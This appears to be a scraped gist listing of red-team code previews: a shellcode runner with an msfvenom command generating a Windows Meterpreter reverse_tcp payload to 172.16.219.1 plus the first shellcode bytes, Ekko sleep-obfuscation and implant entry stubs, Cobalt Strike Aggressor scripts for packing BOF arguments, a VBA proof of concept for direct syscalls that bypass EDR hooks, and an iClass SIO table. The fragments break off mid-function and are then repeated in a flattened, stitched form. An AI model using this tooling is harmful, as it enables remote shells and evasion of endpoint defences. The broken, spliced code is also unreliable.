Coldfusion coldfusion39

## CMakeLists.txt
cmake_minimum_required(VERSION 3.28)
project(untitled C ASM)

set(CMAKE_CXX_STANDARD 17)

set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreaded "")
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDLL "")
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDebug "")
set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDebugDLL "")

## shitcode.c
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>

SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)

{

## Entry.c
D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter )
{
        PARSED_BUF      Psr;

        UINT32          Wrt = 0;

        PARG            Arg = NULL;
        LPWSTR          Nps = NULL;
        HANDLE          Pip = NULL;

## RtlRunOnceExecuteOnceShellcodeExec.c
#include <windows.h>
#include <stdio.h>

extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

## Entry.c
/*!
 *
 * RPROXICMP
 *
 * GuidePoint Security LLC
 *
 * Threat and Attack Simulation Team
 *
!*/

## SIO.md

      
              3 files
            
          
              1 fork
            
          
              0 comments
            
          
              9 stars
            
          
                bettse
                / SIO.md
            
            
              Last active
              July 12, 2024 02:35
            
              
                iClass
              
          
    SIO

If you've only got an SIO and you wonder what the length of the credential is, this information, experimentally derived and provided on Discord, may help.


SIO Payload Length
PACS Minimum Size
PACS Maximum Size


21 Bytes
25 bits
32 bits


22 Bytes
33 bits
40 bits


23 Bytes
41 bits
48 bits


## BOF_With_Variadic_Arguments.cna
# Author:   Justin Lucas
# Date:     January 5, 2023

sub packVariadicArguments
{
    local('$result');
    local('$index');
    local('$currentArgument');

    # Shift and iterate a list with the Beacon ID popped

## custom_pack.cna
#Custom function to pack our arguments for BOFs
#Usage: Call it the same way you would call bof_pack
sub custom_pack {
    local('$beaconId $formatString $formatStringFixed @argsFixed $totalSize $shiftCounter $index $binarySize $packedData')

    #We don't really need this but keeping it so the calling convention is the same
    $beaconId = $1;

    #Our original format string
    $formatString = $2;

## FreshyCalls-VBA.vba
' Proof of Concept: retrieving SSN for syscalling in VBA
' Author: Juan Manuel Fernandez (@TheXC3LL)


'Based on:
'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
'https://www.crummie5.club/freshycalls/


Private Type LARGE_INTEGER

## sleep.c
/*!
 *
 * ROGUE
 *
 * GuidePoint Security LLC
 *
 * Threat and Attack Simulation
 *
!*/
	cmake_minimum_required(VERSION 3.28)
	project(untitled C ASM)

	set(CMAKE_CXX_STANDARD 17)

	set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreaded "")
	set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDLL "")
	set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDebug "")
	set(CMAKE_ASM_COMPILE_OPTIONS_MSVC_RUNTIME_LIBRARY_MultiThreadedDebugDLL "")
	#include <Core.h>
	#include <Win32.h>
	#include <Structs.h>
	#include <Sleep.h>
	#include <Utils.h>

	SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)

	{
	D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter )
	{
	PARSED_BUF Psr;

	UINT32 Wrt = 0;

	PARG Arg = NULL;
	LPWSTR Nps = NULL;
	HANDLE Pip = NULL;
	#include <windows.h>
	#include <stdio.h>

	extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE once, PRTL_RUN_ONCE_INIT_FN func, void param, void **context);
	typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

	// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
	unsigned char shellcode_bin[] =
	"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
	"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
	/*!
	*
	* RPROXICMP
	*
	* GuidePoint Security LLC
	*
	* Threat and Attack Simulation Team
	*
	!*/
SIO Payload Length	PACS Minimum Size	PACS Maximum Size
21 Bytes	25 bits	32 bits
22 Bytes	33 bits	40 bits
23 Bytes	41 bits	48 bits
	# Author: Justin Lucas
	# Date: January 5, 2023

	sub packVariadicArguments
	{
	local('$result');
	local('$index');
	local('$currentArgument');

	# Shift and iterate a list with the Beacon ID popped
	#Custom function to pack our arguments for BOFs
	#Usage: Call it the same way you would call bof_pack
	sub custom_pack {
	local('$beaconId $formatString $formatStringFixed @argsFixed $totalSize $shiftCounter $index $binarySize $packedData')

	#We don't really need this but keeping it so the calling convention is the same
	$beaconId = $1;

	#Our original format string
	$formatString = $2;
	' Proof of Concept: retrieving SSN for syscalling in VBA
	' Author: Juan Manuel Fernandez (@TheXC3LL)


	'Based on:
	'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
	'https://www.crummie5.club/freshycalls/


	Private Type LARGE_INTEGER
	/*!
	*
	* ROGUE
	*
	* GuidePoint Security LLC
	*
	* Threat and Attack Simulation
	*
	!*/